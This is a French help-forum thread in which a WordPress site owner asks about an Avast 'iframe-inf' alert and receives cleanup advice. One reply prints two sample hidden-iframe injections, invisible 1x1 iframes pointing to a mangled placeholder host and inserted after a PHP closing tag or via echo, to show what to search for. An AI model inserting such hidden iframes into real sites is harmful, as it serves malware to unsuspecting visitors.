Mon site est infecté ?

Résolu
Angelneonizz Messages postés 790 Date d'inscription   Statut Membre Dernière intervention   -  
bg62 Messages postés 23433 Date d'inscription   Statut Modérateur Dernière intervention   -
Bonjour,

J'ai besoin de votre aide, un site d'on je m'occupe a un souci, lorsque les gens se connectent sur le site et qu'ils ont AVAST, une alerte avec comme message :

infection: html:iframe-inf

j'ai vérifié mes pages php mais je n'ai rien trouvé, seul AVAST trouve une alerte.

Mon antivirus : Bitdefender Internet Security 2012, ne m'affiche pas d'alerte lorsque je vais sur le site.

Est-ce qu'il y a des solutions mis à part, tout virer et mettre une ancienne sauvegarde ?

merci



--
Il n'y a pas de défaite si on sait en tirer des leçons !

7 réponses

  1. RAD ZONE Messages postés 5362 Statut Contributeur 1 360
     
    salut

    c est le site que tu appel dans l iframe qui pose probleme !! pas ton site

    a+

    ps: vide tes caches !!

    ? La plus grande erreur que puisse faire un homme est d'avoir peur d'en faire une. ?
    0
  2. Angelneonizz Messages postés 790 Date d'inscription   Statut Membre Dernière intervention   190
     
    merci de la réponse mais il n'y a pas d'iframe, voila mon problème. J'ai regardé un peu mes pages php, il n'y a rien.

    avec Chrome j'ai fait, inspecter l'élément, j'ai regardé le code et il n'y a pas d'iframe.

    merci
    0
  3. RAD ZONE Messages postés 5362 Statut Contributeur 1 360
     
    c est un wordpress ??
    0
  4. Angelneonizz Messages postés 790 Date d'inscription   Statut Membre Dernière intervention   190
     
    effectivement , j'ai vérifié les pages index, je n'ai rien trouvé
    Il n'y a pas de défaite si on sait en tirer des leçons !
    0
  5. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  6. RAD ZONE Messages postés 5362 Statut Contributeur 1 360
     
    tu as vérifié ces pages !??

    index.php

    wp-config.php

    index.php dans wp-admin

    index.php dans wp-contents\ton theme\

    default-filters.php dans wp-includes

    les insertions peuvent etre misent apres un ?> de fin de php

    ?>       
    
    <iframe src="htt p:// www.la merde/in.ggi?income10" width=1 height=1 style="visibility:hiden"></iframe>       
    


    ou par une balise echo dans le php

    echo"<iframe src=\"ht tp:// www.la merde/in.ggi?income10\" width=1 height=1 style=\"visibility:hiden;position:absolute\"></iframe>"       
    ?>       
    


    recupere tout les fichiers wordpress sur ton serveur et place les dans un dossier sur ton pc !
    change ton password ftp et cpanel et le mieux est d uploader une nouvelle copie de tous les fichiers WordPress après avoir fait les changements nécessaires dans le fichier wp-config.php.!

    tu controle ensuite TOUT LES FICHIERS SUR TON PC , avec un soft style TextCrawler

    et cherche si il y as une de ces iframes dans les codes !

    control tout les plugin !!!

    si tu ne trouve rien tu reupload tout sur ton serveur !!

    en esperant que la base MySQL ne soit pas infecte par un post , sinon il faudras aussi la nettoyer ! ??

    bonne nuit ;-)))))))

    ? La plus grande erreur que puisse faire un homme est d'avoir peur d'en faire une. ?
    0
  7. Angelneonizz Messages postés 790 Date d'inscription   Statut Membre Dernière intervention   190
     
    merci à tous pour vos réponses.

    Grace au plugin Firebug pour firefox j'ai réussi à virer le code qui foutait la merde. Tous les fichiers index.php et le footer.php de mon thème avaient ce code.

    J'ai tout remodifié.

    BG62 : le thème c'est moi qui l'est fait, donc il n'y a pas de souci de ce coté là.

    encore merci
    0
    1. bg62 Messages postés 23433 Date d'inscription   Statut Modérateur Dernière intervention   2 435
       
      alors, exactement : quel était le problème ???
      0
    2. Angelneonizz Messages postés 790 Date d'inscription   Statut Membre Dernière intervention   190
       
      du code PHP inséré dans toutes les pages index.php + dans la page footer de mon thème.
      0
    3. bg62 Messages postés 23433 Date d'inscription   Statut Modérateur Dernière intervention   2 435
       
      qui venait de toi ... ?
      0
    4. Angelneonizz Messages postés 790 Date d'inscription   Statut Membre Dernière intervention   190
       
      non pas du tout, quelqu'un a soit utilisé une faille wordpress soit il a eu un accès au FTP
      0
    5. bg62 Messages postés 23433 Date d'inscription   Statut Modérateur Dernière intervention   2 435
       
      ok .... alors si tout est nettoyé tant mieux c'est le principal ;)
      0